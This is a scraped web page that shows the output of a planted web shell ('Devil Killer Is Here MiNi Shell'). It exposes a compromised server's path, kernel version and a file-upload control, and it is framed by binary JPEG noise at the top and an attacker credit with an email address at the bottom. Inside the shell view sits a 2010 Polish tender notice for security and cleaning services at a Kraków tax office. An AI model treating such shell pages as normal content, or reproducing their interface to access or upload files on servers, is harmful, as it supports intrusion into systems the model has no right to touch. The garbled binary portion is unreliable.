JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100317/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100317/59141-N-2010.html

<p class="kh_header"><b>Kraków: Wykonywanie usług: ochrony osób i mienia oraz porządkowych w budynku Urzędu Skarbowego Kraków - Stare Miasto i na terenie przyległym (Kraków, ul. Grodzka 63 i 65)</b><br>
<b>Numer ogłoszenia: 59141 - 2010; data zamieszczenia: 17.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy Kraków - Stare Miasto , ul. Grodzka 65, 31-001 Kraków, woj. małopolskie, tel. 012 2938100, faks 012 2938266.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.usstaremiasto.fr.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie usług: ochrony osób i mienia oraz porządkowych w budynku Urzędu Skarbowego Kraków - Stare Miasto i na terenie przyległym (Kraków, ul. Grodzka 63 i 65).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie usług:
- ochrony osób i mienia w rozumieniu ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz. U. z 2005 r. nr 145, poz. 1221 z późn. zm.) oraz zgodnie
z przepisami wewnętrznymi Zamawiającego,
- porządkowych, w budynku Urzędu Skarbowego Kraków - Stare Miasto 
w Krakowie, przy ul. Grodzkiej 63 i 65 oraz na terenie przyległym.

2. Opis obiektu podlegającego ochronie osób i mienia oraz sprzątaniu i utrzymaniu w czystości:
- budynek trzy-kondygnacyjny, wpisany do rejestru zabytków pod nr A-429, posiadający jedno wejście główne od ul. Grodzkiej, dodatkowe wejście od ul. Podzamcze, trzy wewnętrzne od podworca budynku, bramę wjazdową oraz windę.
- zatrudnienie  -  200 osób, pięć dni w tygodniu, w systemie jednozmianowym (poniedziałek 7:15 - 18:00, wtorek - piątek  7:15 - 15:15),
- na drugim piętrze budynku funkcjonuje ogólnodostępna Sala Obsługi Klienta.
UWAGA!
W budynku Urzędu Skarbowego przy ul. Grodzkiej 65 wykonywane są przez firmę zewnętrzną prace remontowo-budowlane związane z remontem oficyny. 
3. Zakres usługi w zakresie ochrony osób i mienia:
- całodobowa ochrona obiektu polegająca na stałej obecności w obiekcie pracownika (również w dni wolne od pracy i święta), wyposażonego w techniczne środki łączności jak również indywidualne środki ochrony osobistej,
- zapewnienie maksymalnego bezpieczeństwa mienia, życia i zdrowia osób przebywających na terenie obiektu,
- kontrolowanie ruchu osobowego zgodnie z przepisami obowiązującymi na terenie obiektu oraz prowadzenie dokumentacji z tym związanej,
- uniemożliwienie przebywania na terenie Urzędu Skarbowego osobom będącym pod wpływem alkoholu, środków odurzających, oraz osób nie posiadających uprawnień 
do przebywania na terenie budynku, patrolowanie obiektu oraz terenu przyległego, jak również prowadzenie obserwacji za pomocą istniejącego systemu monitoringu wizyjnego,
- przeciwdziałanie wszelkim próbom zakłócenia porządku i kradzieży na terenie objętym ochroną ze szczególnym uwzględnieniem ochrony kasy Urzędu, zatrzymywanie osób schwytanych na kradzieży lub dewastujących mienie
i natychmiastowe powiadamianie załogi interwencyjnej Policji oraz Kierownictwa Urzędu,
- niedopuszczenie do wnoszenia na teren obiektu materiałów niebezpiecznych oraz materiałów i towarów przeznaczonych do sprzedaży lub rozpowszechniania,
- kontrola prawidłowości zabezpieczeń mechanicznych oraz wygaszeń oświetlenia 
we wszystkich pomieszczeniach na terenie całego obiektu po opuszczeniu budynku przez pracowników,
- wydawanie i przyjmowanie kluczy do pomieszczeń od pracowników Urzędu i osób wykonujących usługi porządkowe oraz przechowywanie kluczy wg obowiązujących przepisów Zamawiającego,
- udzielanie klientom Urzędu podstawowych informacji w zakresie lokalizacji poszczególnych komórek organizacyjnych Urzędu,
- prowadzenie Książki służby, w której ma być rejestrowane każdorazowe zdanie/przyjęcie służby z podaniem godziny, nazwiska zdającego i przyjmującego służbę oraz wszelkie uwagi i zdarzenia zaistniałe w trakcie pełnienia służby,
- w przypadku napadu, wystąpienia pożaru lub awarii związanych z funkcjonowaniem Urzędu i innych zdarzeń losowych powodujących zagrożenie bezpieczeństwa osób przebywających na terenie obiektu, natychmiastowe powiadomienie odpowiednio Policji, Straży Pożarnej, Kierownictwa Urzędu albo odpowiedzialnego pracownika oraz podjęcie niezbędnych działań celem zapewnienia bezpieczeństwa osób i zabezpieczenia mienia przed zniszczeniem,
- obsługa central oraz systemów alarmowych: sygnalizacji włamania i sygnalizacji pożaru, zamków kodowanych i innych urządzeń zainstalowanych w miejscu pełnienia służby,
- współpraca z firmami wykonującymi dla Urzędu Skarbowego usługi monitoringu antywłamaniowego wraz z interwencją oraz sygnalizacji pożaru. Szczegóły współpracy zostaną określone w Instrukcji pełnienia służby przez pracowników ochrony w Urzędzie Skarbowym Kraków - Stare Miasto, której wzór stanowi załącznik do wzoru umowy,
- w dniach pracujących Urzędu Skarbowego w godzinach: poniedziałek 7.00 - 18.15, wtorek - piątek 7.00 - 15.30, Zamawiający wymaga, aby na terenie obiektu usługę ochrony wykonywała nie więcej niż jedna osoba posiadająca licencję pierwszego stopnia pracownika ochrony, wyposażona w środki przymusu bezpośredniego.
Po godzinach pracy Urzędu Skarbowego tzn. z poniedziałku na wtorek 
w godz. 18.00 - 7.15, wtorek - czwartek 15.15 - 7.15, od piątku od godz. 15.15 
do poniedziałku do godz. 7.15 oraz w dni wolne i święta Zamawiający wymaga, aby na terenie obiektu usługę ochrony wykonywała nie więcej niż jedna osoba, która nie musi posiadać licencji. 
Czas 15 minut tj. pomiędzy godzinami 7.00-7.15, 15.15-15.30 oraz 18.00-18.15 wynikający z przedstawionych powyżej godzin pracy jest czasem, w którym Zamawiający wymaga, aby jednocześnie na terenie obiektu powierzone zadania wykonywał pracownik ochrony posiadający licencję oraz pracownik bez licencji.
Informacja dodatkowa:
W związku z wytycznymi Ministerstwa Finansów, w okresie trwania umowy, 
po wcześniejszym uzgodnieniu terminu, Zamawiający będzie wymagał, aby dodatkowo w dwie soboty w godz. 9.00 - 13.00 oraz cztery dni od wtorku do piątku 
w godz. 15.15 - 18.15 ochronę wykonywał wyłącznie pracownik posiadający licencję.
Wymagania ogólne dotyczące usługi ochrony osób i mienia:
- Wykonawca powinien posiadać ważną koncesję na prowadzenie działalności gospodarczej zgodnie z art. 15 ust. 1 ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia (Dz. U. z 2005r. Nr 145, poz. 1221 z późn. zm.).
- Pracownik ochrony pełniący służbę w godzinach pracy Urzędu Skarbowego powinien posiadać:
- licencję pracownika ochrony fizycznej pierwszego stopnia zgodnie z art. 26 ust. 1 ustawy o ochronie osób i mienia,
- wyposażenie zgodne z art. 38 ust. 2 pkt. 1, 2, 3 ustawy o ochronie osób
i mienia.
Wszyscy pracownicy Wykonawcy winni posiadać:
- umundurowanie, oznakowanie i identyfikator zgodnie ze wzorem przyjętym przez Wykonawcę (Zamawiający zastrzega sobie możliwość akceptacji),
- telefon komórkowy umożliwiający kontakt zewnętrzny,
- umiejętność obsługi typowych systemów alarmowych i innych urządzeń zainstalowanych w miejscu pełnienia służby oraz prowadzenia dokumentacji związanej z pełnioną służbą.
4. Zakres usług porządkowych w obiekcie oraz na terenie przyległym:
- Sprzątanie i utrzymanie czystości wewnątrz budynku Urzędu Skarbowego Kraków - Stare Miasto w Krakowie przy ul. Grodzkiej 63 i 65. Usługa ma być świadczona codziennie (z wyłączeniem dni wolnych od pracy), w dniach pracy Urzędu w godzinach od 1515 do 2030, z wyjątkiem pomieszczenia kasowego, serwerowni i archiwum, w których sprzątanie winno odbywać się w godzinach pracy Urzędu oraz w obecności pracowników Zamawiającego. Pomieszczenia znajdujące się na terenie budowy, w których wykonywane są prace remontowo-budowlane są wyłączone z umowy. 
- Zamawiający wymaga, aby jeden pracownik Wykonawcy pełnił na terenie obiektu dyżur codziennie w dniach pracy Urzędu w godz. od 715 do 1515. Osoba ta winna posiadać odzież z logo firmy wykonującej usługi porządkowe.
UWAGA!
W związku z realizowanym zadaniem inwestycyjnym, podane poniżej wielkości powierzchnisą maksymalne i będą ulegały zmniejszeniu, a rodzaj powierzchni przeznaczony do sprzątaniai utrzymania czystości może ulegać zmianom.

Zestawienie powierzchni do sprzątania i utrzymania czystości wewnątrz budynku (łączna powierzchnia - 2 608,05 m2):
- pomieszczenia biurowe w tym sale obsługi 1 831,01 m2,
- pomieszczenie ochrony 4,16 m2,
- pomieszczenia socjalne 18,82 m2,
- pomieszczenia sanitarne 110,20 m2 w tym dla klientów o powierzchni 10,71 m2,
- powierzchnia korytarzy i klatek schodowych 626,73 m2,
- powierzchnia windy 17,13 m2,
Rodzaje powierzchni w w/w pomieszczeniach:
- wykładzina dywanowa 439,10 m2,
- wykładzina PCV 724,55 m2,
- parkiet 500,58 m2,
- panele 21,47 m2,
- lastriko 349,86 m2,
- płytki  181,01 m 2,
- gres 161,89 m 2,
- posadzka poliuretanowa 198,54 m 2,
- wykładzina antystatyczna 13,92 m 2,
- wykładzina antypoślizgowa - winda 17,13 m2,
Powierzchnie wewnętrzne pionowe:
- okna skrzynkowe dwu kwaterowe (79 szt.) - 230 m2,
- okna pojedyncze (47 szt.) - 142 m2,
- drzwi szklane (13 szt.) - 58 m2,
- szyby nad ladą podawczą na Sali Obsługi Podatnika (9 szt.) - 10,35 m2,
- drzwi 167 szt.,
Wyposażenie łazienek i innych pomieszczeń:
- liczba sedesów 28 szt.,
- liczba pojemników na papier toaletowy 28 szt., 
- liczba umywalek 21 szt.,
- liczba pojemników na mydło 18 szt.,
- liczba koszy na śmieci i niszczarek dokumentów 182 szt.,
- liczba lodówek 2 szt.
- Sprzątanie i utrzymanie czystości na zewnątrz budynku przy ul. Grodzkiej 65
w Krakowie, polegające na sprzątaniu chodnika wzdłuż ul. Podzamcze oraz wzdłuż 
ul. Grodzkiej (od kościoła Św. Idziego do bramy wejściowej do Urzędu Skarbowego), a także terenu podworca (z wyłączeniem placu budowy). 
- W okresie zimowym Zamawiający wymaga, aby w przypadku opadów śniegu, bądź oblodzenia, Wykonawca codziennie (włącznie z dniami wolnymi i świętami) dokonywał odśnieżania i posypywania odpowiednimi środkami antypoślizgowymi powierzchni chodników i terenu dziedzińca od godziny 6.00 oraz w razie potrzeby, również w godzinach pracy Urzędu w celu zapewnienia bezpiecznego 
i bezkolizyjnego poruszania się pieszych.
Zestawienie powierzchni do sprzątania i utrzymania czystości terenu na zewnątrz budynku (łączna powierzchnia - 576,71 m2):
- powierzchnia chodników 226,50 m2,
- powierzchnia holu wjazdowego 24,27 m2,
- powierzchnia dziedzińca - 325,94  m2,

Usługa winna być wykonywana w sposób sprawny, dokładny i terminowy 
przy zastosowaniu najnowszej technologii, techniki sprzętu, materiałów i środków o nie niszczącym działaniu na czyszczone elementy pomieszczeń i ich wystrój. 
Uwaga: niniejsze zamówienie publiczne nie obejmuje pielęgnacji zieleni.

5. Informacje dodatkowe:
- po wcześniejszym otrzymaniu informacji i uzgodnieniu terminu Zamawiający umożliwi Wykonawcy dokonanie wizji lokalnej w celu uzyskania wszelkich informacji, które mogą być przydatne do przygotowania oferty. Zamawiający nie wymaga uczestnictwa w wizji lokalnej, ale ryzyko za treść uzyskanych informacji dla celów sporządzenia oferty pozostaje po stronie Wykonawcy.
- Zamawiający zastrzega sobie prawo do akceptowania pracowników Wykonawcy, którzy będą ochraniać i wykonywać usługi porządkowe w pomieszczeniach Urzędu. W tym celu, Wykonawca zobowiązuje się do:
- przedstawienia listy ww. pracowników wraz z informacją o ich niekaralności,
- przedłożenia podpisanych przez pracowników Wykonawcy stosownych oświadczeń o zapoznaniu się z przepisami dotyczącymi ochrony danych osobowych zawartych w ustawie z dnia 29 sierpnia 1997r. o ochronie danych osobowych (tekst jednolity: Dz. U. z 2002r. Nr 101 poz. 926 z późn. zm.) oraz 
o zachowaniu tajemnicy służbowej, określonej przepisami ustawy o ochronie informacji niejawnych.
Wykonawca dostarczy dokumenty potwierdzające spełnienie w/w wymogów najpóźniej z chwilą podpisania umów. 
W przypadku wystąpienia zmian składu lub zastępstw Wykonawca zobowiązuje się do bieżącej aktualizacji w/w dokumentów oraz licencji (dot. pracowników ochrony wykonujących swoje obowiązki w godzinach pracy Urzędu).
- Wykonawca nie może przy wykonywaniu niniejszego zamówienia korzystać z usług podwykonawców.
- Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia albo reprezentowania w postępowaniu i do zawarcia umowy w sprawie zamówienia publicznego. Wymagania postawione przez Zamawiającego musi spełniać każdy z Wykonawców ubiegających się o wspólne udzielenie zamówienia, przy czym warunki w zakresie sytuacji ekonomiczno finansowej, doświadczenia potencjału technicznego i osób mogą spełniać wspólnie. Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana jako najkorzystniejsza i nie będzie podlegała odrzuceniu, Wykonawcy przed zawarciem umowy w sprawie zamówienia publicznego, przedstawią umowę regulującą współpracę tych Wykonawców.
W sprawach nieuregulowanych w Specyfikacji Istotnych Warunków Zamówienia mają zastosowanie przepisy ustawy z dnia 23.04.1964 r. - Kodeks Cywilny (Dz. U. z 1964 r. Nr 16, poz. 93 z późn. zm.), ustawy z dnia 29.01.2004 r. - Prawo zamówień publicznych (t.j. Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.) oraz ustawy z dnia 22.08.1997 r. o Ochronie osób i mienia (j.t. Dz. U. z 2005 r. Nr 145, poz. 1221 z późn. zm.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 85.31.23.10-5, 90.91.00.00-9, 90.91.92.00-4, 90.61.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunku będzie dokonywana wg zasady spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunku będzie dokonywana wg zasady spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunku będzie dokonywana wg zasady spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunku będzie dokonywana wg zasady spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunku będzie dokonywana wg zasady spełnia /nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.usstaremiasto.fr.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy Kraków - Stare Miasto, 31-001 Kraków, ul. Grodzka 65 pok. 222 II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2010 godzina 10:00, miejsce: Urząd Skarbowy Kraków - Stare Miasto, 31-001 Kraków, ul. Grodzka 65 pok. 222 II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com